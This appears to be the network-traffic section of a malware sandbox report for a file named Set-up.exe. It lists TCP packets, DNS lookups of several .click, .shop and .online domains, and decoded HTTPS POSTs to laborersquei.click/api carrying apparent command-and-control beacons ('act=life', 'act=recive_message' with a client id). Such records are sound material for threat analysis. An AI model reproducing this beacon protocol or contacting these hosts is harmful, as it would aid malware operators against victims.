                                                                                                                                                Dec 30, 2024 18:13:27.102407932 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.102427959 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.102479935 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.102485895 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.104660988 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.104968071 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.104994059 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105026960 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105032921 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105076075 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105230093 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105254889 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105285883 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105293036 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105324984 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105396986 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105446100 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105453014 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105509043 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105645895 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105670929 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105706930 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105712891 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105734110 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105741978 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105799913 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105819941 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105848074 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105853081 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.105878115 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.105895996 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.130004883 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190499067 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190520048 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190557003 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190566063 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190596104 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190607071 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190618992 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190640926 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190671921 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190677881 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190699100 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190718889 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190829992 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190850019 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190886974 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190893888 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.190916061 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.190929890 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.191090107 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.191109896 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.191142082 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.191148043 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.191174030 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.191179991 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.192610025 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.193671942 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.193692923 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.193736076 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.193742037 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.193768024 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.193782091 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.193872929 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.193890095 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.193926096 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.193933010 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.193947077 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.193977118 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.194102049 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.194122076 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.194154978 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.194160938 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.194180012 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.194194078 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.194327116 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.194349051 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.194376945 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.194382906 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548418999 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548423052 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548444986 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548454046 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548573017 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548593998 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548619986 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548625946 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548641920 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548654079 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548880100 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548892975 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548923016 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548928976 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548950911 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548964024 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.550163031 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.633445978 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.633466005 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.633531094 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.633538961 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.633614063 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634183884 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634196043 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634252071 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634258986 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634300947 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634902000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634917974 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634991884 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634998083 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635056973 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.635179043 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635191917 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635250092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.635256052 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635299921 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.636852980 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636867046 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636938095 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.636943102 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636981964 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636985064 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.636992931 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637020111 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637041092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637078047 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637080908 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637116909 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637255907 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637268066 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637307882 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637326956 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637485027 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637492895 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637497902 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637512922 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637531996 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637537003 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637562990 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637574911 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.639486074 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722067118 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722083092 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722132921 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722141027 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722157001 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722187042 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722879887 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722893000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722954035 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722959995 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723110914 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.723839998 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723853111 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723897934 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723918915 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.723925114 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723952055 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.723984003 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725526094 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725539923 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725577116 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725583076 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725605965 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725622892 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725640059 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725665092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725672007 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725687027 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725856066 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725867987 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725903034 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725909948 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725919008 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.726150990 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.726166964 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.726191998 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.726198912 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.726211071 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.728290081 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.820019007 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.820044994 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.820089102 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.820101023 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.820128918 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.824429989 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.824448109 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.824497938 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.824506044 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829471111 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829495907 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829530001 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.829539061 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829566956 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.829916954 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829932928 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829963923 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.829971075 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829988956 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.838886023 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.838900089 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.838937998 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.838947058 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.838972092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839340925 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839359045 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839390039 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839396000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839413881 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839544058 CET44349720104.21.37.128192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 18:13:09.477999926 CET | 55579 | 53 | 192.168.2.5 | 1.1.1.1
Dec 30, 2024 18:13:09.492302895 CET | 53 | 55579 | 1.1.1.1 | 192.168.2.5
Dec 30, 2024 18:13:18.764214993 CET | 57276 | 53 | 192.168.2.5 | 1.1.1.1
Dec 30, 2024 18:13:18.869693995 CET | 53 | 57276 | 1.1.1.1 | 192.168.2.5
Dec 30, 2024 18:13:20.057672977 CET | 58461 | 53 | 192.168.2.5 | 1.1.1.1
Dec 30, 2024 18:13:20.070615053 CET | 53 | 58461 | 1.1.1.1 | 192.168.2.5
Dec 30, 2024 18:13:21.196010113 CET | 52710 | 53 | 192.168.2.5 | 1.1.1.1
Dec 30, 2024 18:13:21.204401970 CET | 53 | 52710 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 18:13:09.477999926 CET | 192.168.2.5 | 1.1.1.1 | 0x64e1 | Standard query (0) | laborersquei.click | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:18.764214993 CET | 192.168.2.5 | 1.1.1.1 | 0x4ad5 | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:20.057672977 CET | 192.168.2.5 | 1.1.1.1 | 0x2fde | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:21.196010113 CET | 192.168.2.5 | 1.1.1.1 | 0xf280 | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 18:13:09.492302895 CET | 1.1.1.1 | 192.168.2.5 | 0x64e1 | No error (0) | laborersquei.click | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:09.492302895 CET | 1.1.1.1 | 192.168.2.5 | 0x64e1 | No error (0) | laborersquei.click | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:18.869693995 CET | 1.1.1.1 | 192.168.2.5 | 0x4ad5 | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:20.070615053 CET | 1.1.1.1 | 192.168.2.5 | 0x2fde | No error (0) | klipvumisui.shop | | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:20.070615053 CET | 1.1.1.1 | 192.168.2.5 | 0x2fde | No error (0) | klipvumisui.shop | | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 18:13:21.204401970 CET | 1.1.1.1 | 192.168.2.5 | 0xf280 | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false

                                                                                                                                                • laborersquei.click
                                                                                                                                                • cegu.shop
                                                                                                                                                • klipvumisui.shop

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:10 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 8
                                                                                                                                                Host: laborersquei.click
2024-12-30 17:13:10 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                Data Ascii: act=life
2024-12-30 17:13:10 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:10 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=7rj7ldcepeccp9d6104j3qbptp; expires=Fri, 25 Apr 2025 10:59:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uX1ZlxSd6G6BDwT%2F453BM6hw7JBFa2YLKzPRZYamOElVzOgZP%2F9qzKwz%2BzLWO6fFxo87m%2BN97iD8u%2B3Xrj5gcjwjvxotHKThjEYbl59j0YZp8SPMgSmhQ22ffsF7KdZL2WwWQow%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8ae0b8b4363-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1640&rtt_var=624&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1780487&cwnd=238&unsent_bytes=0&cid=23d329adac9f6d18&ts=492&x=0"
2024-12-30 17:13:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-30 17:13:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | 2164 | C:\Users\user\Desktop\Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 17:13:10 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 77
                                                                                                                                                Host: laborersquei.click
2024-12-30 17:13:10 UTC | 77 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d
2024-12-30 17:13:11 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:11 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=fc3e2pmngfh7m2q44iqn2vr6hp; expires=Fri, 25 Apr 2025 10:59:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zp9FC4RjImgUy22H6RGmhtbVMP5WMUH%2FjGoyIKwDjuhPZOO9L1Pj3aR7k3Y33b8DgINHtDX2Jpj%2FEHWF6RugbVEfndx3VmcrSHrhMw5jh4FqknA3bfPPKb4ocEb4aPlA7pH%2FMaA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8b3fe3f4386-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1615&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=979&delivery_rate=1794714&cwnd=246&unsent_bytes=0&cid=3310ebf7d42c56ac&ts=483&x=0"
